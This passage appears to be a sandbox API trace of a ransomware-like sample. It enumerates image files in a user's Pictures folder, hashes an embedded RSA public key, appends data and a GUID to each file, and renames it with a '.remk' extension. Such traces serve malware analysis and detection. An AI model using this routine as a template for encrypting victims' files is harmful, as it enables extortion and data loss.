lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0236.455] CloseHandle (hObject=0x640) returned 1 [0236.458] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0236.458] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8d0) returned 0x37bd408 [0236.458] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0236.459] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\FzGfdyB6\\5aUm.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\4hub e9qkhwukhz-\\fzgfdyb6\\5aum.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\FzGfdyB6\\5aUm.png.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\4hub e9qkhwukhz-\\fzgfdyb6\\5aum.png.remk")) returned 1 [0236.460] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bd408 | out: hHeap=0x630000) returned 1 [0236.460] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0236.460] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.461] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0236.461] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc56d6e0, ftCreationTime.dwHighDateTime=0x1d5dafa, ftLastAccessTime.dwLowDateTime=0x7aabc770, ftLastAccessTime.dwHighDateTime=0x1d5d8a1, ftLastWriteTime.dwLowDateTime=0x7aabc770, ftLastWriteTime.dwHighDateTime=0x1d5d8a1, nFileSizeHigh=0x0, nFileSizeLow=0x5394, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eoDi5iM0Omq.jpg", cAlternateFileName="EODI5I~1.JPG")) returned 1 [0236.461] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3185d80 [0236.461] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x106) returned 0x31f6b30 [0236.461] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3185d80 | out: hHeap=0x630000) returned 1 [0236.461] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\FzGfdyB6\\eoDi5iM0Omq.jpg") returned=".jpg" [0236.461] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\FzGfdyB6\\eoDi5iM0Omq.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\4hub e9qkhwukhz-\\fzgfdyb6\\eodi5im0omq.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0236.462] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=21396) returned 1 [0236.462] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0236.465] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x536e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.465] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0236.467] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0236.467] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0236.467] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0236.467] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x5394, lpOverlapped=0x0) returned 1 [0236.468] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.468] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0236.468] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.468] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.468] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x6951f0) returned 1 [0236.469] CryptCreateHash (in: hProv=0x6951f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0236.469] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0236.469] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0236.469] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0236.470] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0236.470] GetLastError () returned 0x0 [0236.470] CryptDestroyHash (hHash=0x31de170) returned 1 [0236.470] CryptReleaseContext (hProv=0x6951f0, dwFlags=0x0) returned 1 [0236.470] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0236.470] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0236.470] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0236.470] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0236.470] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0236.470] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0236.470] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0236.470] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x5390) returned 0x37c6278 [0236.470] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0236.470] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0236.470] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x31c0d08 [0236.470] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0236.471] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0236.471] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0236.471] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37ceb98 [0236.471] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc738 [0236.471] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37cebe0 [0236.471] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc750 [0236.471] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc780 [0236.471] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc7e0 [0236.471] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc798 [0236.471] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0236.471] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0236.471] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1db0 [0236.471] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0236.471] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc780 | out: hHeap=0x630000) returned 1 [0236.471] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc798 | out: hHeap=0x630000) returned 1 [0236.471] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc7e0 | out: hHeap=0x630000) returned 1 [0236.471] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0236.471] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0236.471] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc7e0 [0236.471] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0236.472] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc798 [0236.472] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0f28 [0236.472] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x37bc780 [0236.472] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0236.472] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0236.472] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0236.472] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0236.472] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0236.472] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6c48 [0236.472] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0236.472] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0236.472] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0236.472] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc798 | out: hHeap=0x630000) returned 1 [0236.472] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0236.472] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc780 | out: hHeap=0x630000) returned 1 [0236.472] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0236.472] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0236.472] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc7e0 | out: hHeap=0x630000) returned 1 [0236.472] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0236.472] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0236.473] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1db0 | out: hHeap=0x630000) returned 1 [0236.473] GetCurrentThreadId () returned 0x314 [0236.473] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0236.473] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c5b50 [0236.473] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0236.473] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6951f0 [0236.473] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0236.473] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0236.473] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0236.473] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0236.473] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.473] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.473] GetCurrentThreadId () returned 0x314 [0236.473] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.473] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.473] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x65dd10 [0236.473] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.473] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.473] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.473] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.473] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0236.473] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0236.474] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0236.474] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0236.474] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0236.474] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x6a7330 [0236.474] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0236.474] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc7e0 [0236.474] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0236.474] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0236.474] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0236.474] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0236.474] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0236.474] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0236.474] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0236.474] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0236.474] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc780 [0236.474] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0236.474] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0236.474] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0236.474] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0236.474] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0236.475] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0236.475] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0236.475] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x5394, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.475] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0236.475] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0236.476] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.476] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0236.476] CloseHandle (hObject=0x640) returned 1 [0236.477] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\FzGfdyB6\\eoDi5iM0Omq.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\4hub e9qkhwukhz-\\fzgfdyb6\\eodi5im0omq.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\FzGfdyB6\\eoDi5iM0Omq.jpg.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\4hub e9qkhwukhz-\\fzgfdyb6\\eodi5im0omq.jpg.remk")) returned 1 [0236.478] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bd408 | out: hHeap=0x630000) returned 1 [0236.478] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0236.478] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.480] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0236.480] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b298f70, ftCreationTime.dwHighDateTime=0x1d5d866, ftLastAccessTime.dwLowDateTime=0xfe55db40, ftLastAccessTime.dwHighDateTime=0x1d5e6e0, ftLastWriteTime.dwLowDateTime=0xfe55db40, ftLastWriteTime.dwHighDateTime=0x1d5e6e0, nFileSizeHigh=0x0, nFileSizeLow=0x8f3f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EOkvXHoEt.gif", cAlternateFileName="EOKVXH~1.GIF")) returned 1 [0236.480] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\FzGfdyB6\\EOkvXHoEt.gif") returned=".gif" [0236.480] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\FzGfdyB6\\EOkvXHoEt.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\4hub e9qkhwukhz-\\fzgfdyb6\\eokvxhoet.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0236.481] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=36671) returned 1 [0236.481] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0236.484] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x8f19, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.484] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0236.486] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x8f3f, lpOverlapped=0x0) returned 1 [0236.487] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.487] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.487] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.487] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x6951f0) returned 1 [0236.488] CryptCreateHash (in: hProv=0x6951f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0236.488] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0236.488] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0236.488] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0236.488] GetLastError () returned 0x0 [0236.489] CryptDestroyHash (hHash=0x31de170) returned 1 [0236.489] CryptReleaseContext (hProv=0x6951f0, dwFlags=0x0) returned 1 [0236.489] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0236.489] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0236.489] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0236.489] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 